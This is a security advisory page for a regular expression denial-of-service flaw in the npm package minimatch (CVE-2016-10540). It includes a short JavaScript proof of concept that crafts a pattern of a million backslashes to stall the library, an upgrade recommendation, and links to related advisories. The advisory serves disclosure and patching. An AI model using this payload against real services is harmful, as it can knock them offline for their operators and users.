Lucene search
Nick StarkeNODEJS:118HistoryMay 25, 2016 - 4:37 p.m.
Regular Expression Denial of Service
2016-05-2516:37:20
Nick Starke
www.npmjs.com
29
0.001 Low
EPSS
Percentile
47.0%
Overview
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
Proof of Concept
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Recommendation
Update to version 3.0.2 or later.
References
Related
veracode
veracode
Denial Of Service (DoS)
2019-01-15 09:12:45
nvd
nvd
CVE-2016-10540
2018-05-31 20:29:01
CVE-2016-1000023
2018-06-17 20:29:00
debiancve
debiancve
CVE-2016-10540
2018-05-31 20:29:01
nessus
nessus
Ubuntu 16.04 ESM : minimatch vulnerability (USN-4783-1)
2023-10-20 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-4783-1)
2023-01-27 00:00:00
osv
osv
Regular Expression Denial of Service in minimatch
2018-10-09 00:40:41
CVE-2016-10540
2018-05-31 20:29:01
node-minimatch vulnerability
2021-03-15 20:59:21
ubuntu
ubuntu
minimatch vulnerability
2021-03-15 00:00:00
cvelist
cvelist
CVE-2016-10540
2018-04-26 00:00:00
ubuntucve
ubuntucve
CVE-2016-10540
2018-05-31 00:00:00
prion
prion
Code injection
2018-05-31 20:29:00
Design/Logic Flaw
2018-06-17 20:29:00
github
github
Regular Expression Denial of Service in minimatch
2018-10-09 00:40:41
cve
cve
CVE-2016-10540
2018-05-31 20:29:01
CVE-2016-1000023
2018-06-17 20:29:00
ibm
ibm